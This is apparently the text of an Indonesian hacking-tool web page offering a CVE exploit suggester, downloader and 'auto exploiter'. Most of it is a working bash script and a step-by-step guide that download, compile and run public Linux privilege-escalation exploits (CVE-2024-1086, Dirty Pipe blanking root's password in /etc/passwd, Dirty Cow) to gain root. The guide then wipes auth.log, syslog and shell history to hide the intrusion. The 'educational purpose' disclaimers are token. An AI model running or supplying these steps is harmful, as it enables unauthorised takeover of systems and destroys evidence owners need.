š CVE DATABASE
ā ļø Database ini untuk EDUCATIONAL PURPOSE saja!
ā³ Memuat database CVE...
šÆ CVE EXPLOIT SUGGESTER
ā ļø Suggest exploit berdasarkan kernel version dan OS
š§ INPUT KERNEL VERSION
Masukkan kernel version untuk mendapatkan rekomendasi exploit
ā³ Masukkan kernel version...
š„ EXPLOIT DOWNLOADER
ā ļø Download exploit dari berbagai sumber untuk edukasi
š„ DOWNLOAD EXPLOIT
Pilih CVE untuk mendownload exploit
ā³ Pilih CVE dan klik DOWNLOAD...
š¤ AUTO CVE EXPLOITER
ā ļø PERINGATAN! Hanya untuk testing server sendiri!
š¤ AUTO DETECT & EXPLOIT
Script auto detect kernel dan jalankan exploit yang cocok
#!/bin/bash
# ============================================================
# š¤ AUTO CVE EXPLOITER - DYCAL HACKING TOOLS
# ============================================================
# Auto detect kernel & run matching exploit
# ============================================================
echo "š¤ AUTO CVE EXPLOITER"
echo "========================================="
# Get kernel version
KERNEL=$(uname -r)
echo "[+] Kernel: $KERNEL"
# Check CVE-2024-1086 (5.x - 6.8)
if [[ "$KERNEL" =~ "5.[0-9]" ]] || [[ "$KERNEL" =~ "6.[0-8]" ]]; then
echo "ā ļø VULNERABLE TO CVE-2024-1086!"
echo "[+] Downloading exploit..."
wget -q https://raw.githubusercontent.com/vettrivel007/CVE-2024-1086/main/exploit.c -O /tmp/exp.c
gcc -o /tmp/exp /tmp/exp.c 2>/dev/null
/tmp/exp 2>/dev/null
if [ $(whoami) == "root" ]; then
echo "ā
ROOT ACCESS GAINED!"
exit 0
fi
fi
# Check Dirty Pipe (5.8 - 5.16)
if [[ "$KERNEL" =~ "5.[8-9]" ]] || [[ "$KERNEL" =~ "5.1[0-6]" ]]; then
echo "ā ļø VULNERABLE TO DIRTY PIPE!"
wget -q https://raw.githubusercontent.com/lyx/dirtypipe/main/dirtypipe.c -O /tmp/dp.c
gcc -o /tmp/dp /tmp/dp.c 2>/dev/null
/tmp/dp /etc/passwd "root::0:0:root:/root:/bin/bash" 2>/dev/null
if [ $(whoami) == "root" ]; then
echo "ā
ROOT ACCESS GAINED!"
exit 0
fi
fi
# Check Dirty Cow (2.6 - 4.8)
if [[ "$KERNEL" =~ "2.[6-9]" ]] || [[ "$KERNEL" =~ "3.[0-9]" ]] || [[ "$KERNEL" =~ "4.[0-8]" ]]; then
echo "ā ļø VULNERABLE TO DIRTY COW!"
wget -q https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c -O /tmp/dc.c
gcc -pthread /tmp/dc.c -o /tmp/dc 2>/dev/null
/tmp/dc root 2>/dev/null
if [ $(whoami) == "root" ]; then
echo "ā
ROOT ACCESS GAINED!"
exit 0
fi
fi
echo "ā No matching exploit found."
echo "š” Run: python3 cve_suggester.py --kernel $KERNEL"ā³ Ready...
š STEP BY STEP - CVE & EXPLOIT
ā ļø PERINGATAN! Semua langkah ini hanya untuk EDUCATIONAL PURPOSE!
STEP 1: Cek Kernel Version
Cek kernel version untuk mengetahui CVE yang cocok
uname -r
š” Tips: Contoh output: 5.14.0-570.25.1.el9_6.x86_64
STEP 2: Scan CVE dengan Suggester
Gunakan CVE Suggester untuk mencari exploit yang cocok
python3 cve_suggester.py --kernel 5.14.0
STEP 3: Download Exploit
Download exploit yang sesuai dari repository
# Download CVE-2024-1086
git clone https://github.com/vettrivel007/CVE-2024-1086
# Download Dirty Pipe
wget https://raw.githubusercontent.com/lyx/dirtypipe/main/dirtypipe.c
# Download Dirty Cow
wget https://raw.githubusercontent.com/firefart/dirtycow/master/dirty.c
STEP 4: Compile Exploit
Compile exploit dengan GCC
# Compile CVE-2024-1086
cd CVE-2024-1086 && make
# Compile Dirty Pipe
gcc -o dirtypipe dirtypipe.c
# Compile Dirty Cow
gcc -pthread dirty.c -o dirty
STEP 5: Jalankan Exploit
Jalankan exploit untuk mendapatkan root access
# Run CVE-2024-1086
./exploit
# Run Dirty Pipe
./dirtypipe /etc/passwd "root::0:0:root:/root:/bin/bash"
# Run Dirty Cow
./dirty root
STEP 6: Verifikasi Root Access
Cek apakah sudah berhasil mendapatkan root
whoami
id
cat /etc/passwd | grep "root::0"
STEP 7: Cleanup
Bersihkan jejak exploit
# Hapus file exploit
rm -rf CVE-2024-1086 dirtypipe dirtypipe.c dirty dirty.c
# Clear logs
cat /dev/null > /var/log/auth.log
cat /dev/null > /var/log/syslog
history -c
ā
SELESAI! Sekarang tuan sudah bisa mengelola CVE dan exploit dengan lengkap! šÆ